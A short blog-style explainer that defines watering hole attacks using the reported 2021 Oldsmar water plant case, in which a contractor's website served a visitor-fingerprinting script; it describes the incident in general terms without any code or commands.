Watering Hole Attack
Watering Hole Attack
In what became a classic watering hole attack, a Florida water, and wastewater treatment facility contractor inadvertently hosted malicious code on its website, leading to the reported Oldsmar water plant hack in 2021. The cybercriminals behind the attack seemed to have a distinct audience in mind — the malicious code found on the contractor’s site also appeared to target other Florida water utilities, and perhaps not surprisingly, was visited by a browser sourced to the city of Oldsmar on the same day of the hack. While the website didn’t launch exploit code, it instead injected malware that functioned as a browser enumeration and fingerprinting script designed to glean information from site visitors, including operating system, browser type, time zone, and presence of camera and microphone, which it then sent to a remote database hosted on a Heroku app site that also stored the script.
What you need to know: Like a literal watering hole, a watering hole attack is one in which the user’s computer is compromised by visiting an infected website with malware designed to infiltrate their network and steal data or financial assets. The specific technique is essentially a zeroday attack — the goal being to infect the computer system to gain access to a network for financial gain or proprietary information.
Comments
Post a Comment